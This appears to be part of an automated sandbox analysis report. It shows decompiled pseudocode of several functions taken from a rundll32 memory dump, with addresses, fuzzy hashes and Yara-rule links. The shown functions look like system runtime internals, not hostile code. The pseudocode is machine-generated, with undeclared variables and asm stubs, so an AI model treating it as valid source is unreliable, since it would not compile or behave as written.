                                                                                            0x04634476
                                                                                            0x045daa64
                                                                                            0x045daa74
                                                                                            0x0463447c
                                                                                            0x04634483
                                                                                            0x04634492
                                                                                            0x045daa52
                                                                                            0x045daa54
                                                                                            0x045daa5e
                                                                                            0x046344a8
                                                                                            0x046344ad
                                                                                            0x046344af
                                                                                            0x046344b6
                                                                                            0x046344b6
                                                                                            0x046344b9
                                                                                            0x046344bc
                                                                                            0x046344cd
                                                                                            0x046344d3
                                                                                            0x046344d6
                                                                                            0x046344e1
                                                                                            0x046344e1
                                                                                            0x046344e6
                                                                                            0x046344e8
                                                                                            0x046344fb
                                                                                            0x046344fb
                                                                                            0x046344e8
                                                                                            0x00000000
                                                                                            0x045daa5e
                                                                                            0x04634476
                                                                                            0x045daa42
                                                                                            0x045daa46
                                                                                            0x045daa48
                                                                                            0x045daa4c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab0347a06af800561864b87b3a880a845e2cf3ff498a9f338353c33ce5c0e21a
                                                                                            • Instruction ID: 9bae58ab6951952252eddb19f9d0adde3bbfc214ec8dd7e732659806ac3268b8
                                                                                            • Opcode Fuzzy Hash: ab0347a06af800561864b87b3a880a845e2cf3ff498a9f338353c33ce5c0e21a
                                                                                            • Instruction Fuzzy Hash: 8331C071A0061AABDB159F68CD81ABFB3B8FF44704B044469F905E7250FB34BD11EBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04614A2C Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 58%
                                                                                            			E04614A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x46cd360 ^ _t62;
				_v8 =  *0x46cd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E045F2280(_t26, 0x46c8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E045EFFB0(_t41, _t51, 0x46c8608);
						L2:
						 *0x46cb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0461B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E045F2280(_t28, 0x46c8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E045EFFB0(_t42, _t53, 0x46c8608);
							if(_t53 != 0) {
								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E045EFFB0(_t41, _t51, 0x46c8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                            0x04614a2c
                                                                                            0x04614a34
                                                                                            0x04614a3c
                                                                                            0x04614a3e
                                                                                            0x04614a48
                                                                                            0x04614a4b
                                                                                            0x04614a4d
                                                                                            0x04614a51
                                                                                            0x04614a9c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04614aa3
                                                                                            0x04614aa8
                                                                                            0x04614aad
                                                                                            0x04614ab1
                                                                                            0x04614ade
                                                                                            0x04614ae3
                                                                                            0x04614a5a
                                                                                            0x04614a62
                                                                                            0x04614a6a
                                                                                            0x04614a6e
                                                                                            0x0464f203
                                                                                            0x04614a84
                                                                                            0x04614a88
                                                                                            0x04614a89
                                                                                            0x04614a8a
                                                                                            0x04614a95
                                                                                            0x04614a95
                                                                                            0x04614a79
                                                                                            0x04614a80
                                                                                            0x04614af2
                                                                                            0x04614af4
                                                                                            0x04614af9
                                                                                            0x04614aff
                                                                                            0x04614b01
                                                                                            0x04614b03
                                                                                            0x04614b08
                                                                                            0x0464f20a
                                                                                            0x0464f212
                                                                                            0x0464f216
                                                                                            0x0464f216
                                                                                            0x04614b08
                                                                                            0x04614b13
                                                                                            0x04614b1a
                                                                                            0x0464f229
                                                                                            0x0464f229
                                                                                            0x04614b1a
                                                                                            0x04614a82
                                                                                            0x00000000
                                                                                            0x04614a82
                                                                                            0x04614ab7
                                                                                            0x04614acd
                                                                                            0x04614acd
                                                                                            0x04614ad5
                                                                                            0x04614ada
                                                                                            0x00000000
                                                                                            0x04614ada
                                                                                            0x04614ac2
                                                                                            0x04614acb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04614acb
                                                                                            0x04614a53
                                                                                            0x04614a53
                                                                                            0x04614a58
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 349f327465df06ec8a3553bb0fc63767674ef7948b5dcc5679b5b176880907d6
                                                                                            • Instruction ID: 0a9bd457b5383314ec474477a87bc9a7cc66fa56c41ea07b63ce4beb4cfa6fa7
                                                                                            • Opcode Fuzzy Hash: 349f327465df06ec8a3553bb0fc63767674ef7948b5dcc5679b5b176880907d6
                                                                                            • Instruction Fuzzy Hash: F83101323012919BC721AF55C944B2AB7A4FBC1B15F09042AE9164B764FF70F801DB8A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04618EC7 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E04618EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x46cd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04604E70(0x46c86e4, 0x4619490, 0, 0);
					if( *0x46c53e8 > 5 && E04618F33(0x46c53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x46c53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x46c53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x45bbc46;
						_t48 = E04657B9C(0x46c53e8, 0x45bbc46, _t67, 0x46c53e8, _t70,  &_v140);
					}
				}
				return E0461B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                            0x04618ec7
                                                                                            0x04618ed9
                                                                                            0x04618edc
                                                                                            0x04618ee6
                                                                                            0x04618ee9
                                                                                            0x04618eee
                                                                                            0x04618efc
                                                                                            0x04618f08
                                                                                            0x04651349
                                                                                            0x04651353
                                                                                            0x0465135d
                                                                                            0x04651366
                                                                                            0x0465136f
                                                                                            0x04651375
                                                                                            0x0465137c
                                                                                            0x04651385
                                                                                            0x04651390
                                                                                            0x04651391
                                                                                            0x0465139c
                                                                                            0x0465139d
                                                                                            0x046513a6
                                                                                            0x046513ac
                                                                                            0x046513b2
                                                                                            0x046513b5
                                                                                            0x046513bc
                                                                                            0x046513bf
                                                                                            0x046513c2
                                                                                            0x046513c5
                                                                                            0x046513c8
                                                                                            0x046513cb
                                                                                            0x046513ce
                                                                                            0x046513d1
                                                                                            0x046513d4
                                                                                            0x046513d7
                                                                                            0x046513da
                                                                                            0x046513dd
                                                                                            0x046513e0
                                                                                            0x046513e3
                                                                                            0x046513e6
                                                                                            0x046513e9
                                                                                            0x046513f6
                                                                                            0x04651400
                                                                                            0x04651400
                                                                                            0x04618f08
                                                                                            0x04618f32

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 653ca3cb52380d167129406d3995ff0c2a471e8c01b716f8528f3b30aa31e4a5
                                                                                            • Instruction ID: 9473846b9a8c70111a60d85b2a41d0e08c1daf449da5564f1172370e762e02c4
                                                                                            • Opcode Fuzzy Hash: 653ca3cb52380d167129406d3995ff0c2a471e8c01b716f8528f3b30aa31e4a5
                                                                                            • Instruction Fuzzy Hash: 3541A2B1D003189FDB20DFAAD980AADFBF4FB48714F5041AEE549A7240E774AA44CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460E730 Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E0460E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04619670() < 0) {
					L0462DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x46c7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L045F4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0460E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                            0x0460e730
                                                                                            0x0460e736
                                                                                            0x0460e738
                                                                                            0x0460e73d
                                                                                            0x0460e73e
                                                                                            0x0460e740
                                                                                            0x0460e749
                                                                                            0x0460e765
                                                                                            0x0460e76a
                                                                                            0x0460e76b
                                                                                            0x0460e76c
                                                                                            0x0460e76d
                                                                                            0x0460e76e
                                                                                            0x0460e76f
                                                                                            0x0460e775
                                                                                            0x0460e777
                                                                                            0x0460e77e
                                                                                            0x0464b675
                                                                                            0x0460e784
                                                                                            0x0460e784
                                                                                            0x0460e789
                                                                                            0x0460e7a8
                                                                                            0x0460e7ac
                                                                                            0x0460e807
                                                                                            0x0460e7ae
                                                                                            0x0460e7ae
                                                                                            0x0460e7b1
                                                                                            0x0460e7b4
                                                                                            0x0460e7b9
                                                                                            0x0460e7c0
                                                                                            0x0460e7c4
                                                                                            0x0460e7ca
                                                                                            0x0460e7cc
                                                                                            0x00000000
                                                                                            0x0460e7d3
                                                                                            0x0460e7d6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460e7ff
                                                                                            0x0460e802
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460e7f9
                                                                                            0x0460e7fc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460e7f3
                                                                                            0x0460e7f6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460e7ed
                                                                                            0x0460e7f0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460e7e7
                                                                                            0x0460e7ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464b685
                                                                                            0x0464b688
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464b682
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460e7cc
                                                                                            0x0460e7d9
                                                                                            0x0460e7dc
                                                                                            0x0460e7de
                                                                                            0x0460e7de
                                                                                            0x0460e7ac
                                                                                            0x0460e7e4
                                                                                            0x0460e74b
                                                                                            0x0460e751
                                                                                            0x0460e759
                                                                                            0x0460e761
                                                                                            0x0460e761

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 00e4d0c5e87caca48cee9b4a900aaa4a5fd6b31d047dd1b173a54588f059988b
                                                                                            • Instruction ID: e77dbacb57b95bbac061ad37903d88d291a59e43f2d70c4d196cde78c2563464
                                                                                            • Opcode Fuzzy Hash: 00e4d0c5e87caca48cee9b4a900aaa4a5fd6b31d047dd1b173a54588f059988b
                                                                                            • Instruction Fuzzy Hash: 0C318D75A14249EFE744CF58C840B9AB7E8FB19314F14866AF904CB381E672FD80CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460BC2C Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E0460BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x46c6100; // 0x48
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E045F2280(0xd, 0x161df1a0);
				_t41 =  *0x46c60f8; // 0x0
				if(_t41 != 0) {
					 *0x46c60f8 =  *_t41;
					 *0x46c60fc =  *0x46c60fc + 0xffff;
				}
				E045EFFB0(_t41, 0x800, 0x161df1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x46c60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L045F4620(0x46c6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x46c6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                            0x0460bc36
                                                                                            0x0460bc42
                                                                                            0x0460bc45
                                                                                            0x0460bc4a
                                                                                            0x0460bd35
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460bc50
                                                                                            0x0460bc50
                                                                                            0x0460bc58
                                                                                            0x0460bc5a
                                                                                            0x0460bc60
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464a4f2
                                                                                            0x0464a4f6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464a4fc
                                                                                            0x0460bc79
                                                                                            0x0460bc7e
                                                                                            0x0460bc86
                                                                                            0x0460bd16
                                                                                            0x0460bd20
                                                                                            0x0460bd20
                                                                                            0x0460bc8d
                                                                                            0x0460bc94
                                                                                            0x0460bcbd
                                                                                            0x0460bcca
                                                                                            0x0460bccb
                                                                                            0x0460bccc
                                                                                            0x0460bccd
                                                                                            0x0460bcce
                                                                                            0x0460bcd4
                                                                                            0x0460bcea
                                                                                            0x0460bcee
                                                                                            0x0460bcf2
                                                                                            0x0460bd00
                                                                                            0x0460bd04
                                                                                            0x00000000
                                                                                            0x0460bc96
                                                                                            0x0460bcab
                                                                                            0x0460bcaf
                                                                                            0x0460bd2c
                                                                                            0x0460bd2c
                                                                                            0x0460bd09
                                                                                            0x00000000
                                                                                            0x0460bd09
                                                                                            0x0460bcb1
                                                                                            0x0460bcb5
                                                                                            0x0460bcbb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460bcbb

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a0cae32536436751fa6ff518c0e17355d3de22a426b6aca54026158fb1cca22
                                                                                            • Instruction ID: bf7c37059b89350c20f381bfa51dab419f309ffb4ae5fe2cadb45651978e2ec6
                                                                                            • Opcode Fuzzy Hash: 7a0cae32536436751fa6ff518c0e17355d3de22a426b6aca54026158fb1cca22
                                                                                            • Instruction Fuzzy Hash: 9F31FF726006069FDB11DF98D4807BBB3A4FB68711F04807AE914EB381FA78FD058B88
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D9100 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E045D9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x46af6e8);
				E0462D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E046A88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0462D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x46c86c0; // 0x29e07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x46c86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E045F2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E046A88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0461AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x46cb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x46c84c0;
										if(_t69 >=  *0x46c84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E046A9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E045D922A(_t82);
							_t53 = E045F7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E046A8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x46c86c0; // 0x29e07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x46c86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x46c86bc;
										_t72 = 0x46c86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E045D9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x46c86c4;
									_t72 = 0x46c86c0;
									L18:
									E04609B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                            0x045d9100
                                                                                            0x045d9100
                                                                                            0x045d9100
                                                                                            0x045d9100
                                                                                            0x045d9102
                                                                                            0x045d9107
                                                                                            0x045d910c
                                                                                            0x045d9110
                                                                                            0x045d9115
                                                                                            0x045d9136
                                                                                            0x045d9143
                                                                                            0x046337e4
                                                                                            0x046337e4
                                                                                            0x045d9149
                                                                                            0x045d914e
                                                                                            0x045d914e
                                                                                            0x045d9117
                                                                                            0x045d911d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045d911f
                                                                                            0x045d9125
                                                                                            0x00000000
                                                                                            0x045d9151
                                                                                            0x045d9158
                                                                                            0x045d915d
                                                                                            0x045d9161
                                                                                            0x045d9168
                                                                                            0x04633715
                                                                                            0x00000000
                                                                                            0x045d916e
                                                                                            0x045d916e
                                                                                            0x045d9175
                                                                                            0x045d9177
                                                                                            0x045d917e
                                                                                            0x045d917f
                                                                                            0x045d9182
                                                                                            0x045d9182
                                                                                            0x045d9187
                                                                                            0x045d9187
                                                                                            0x045d918a
                                                                                            0x045d918d
                                                                                            0x045d918f
                                                                                            0x045d9192
                                                                                            0x045d9195
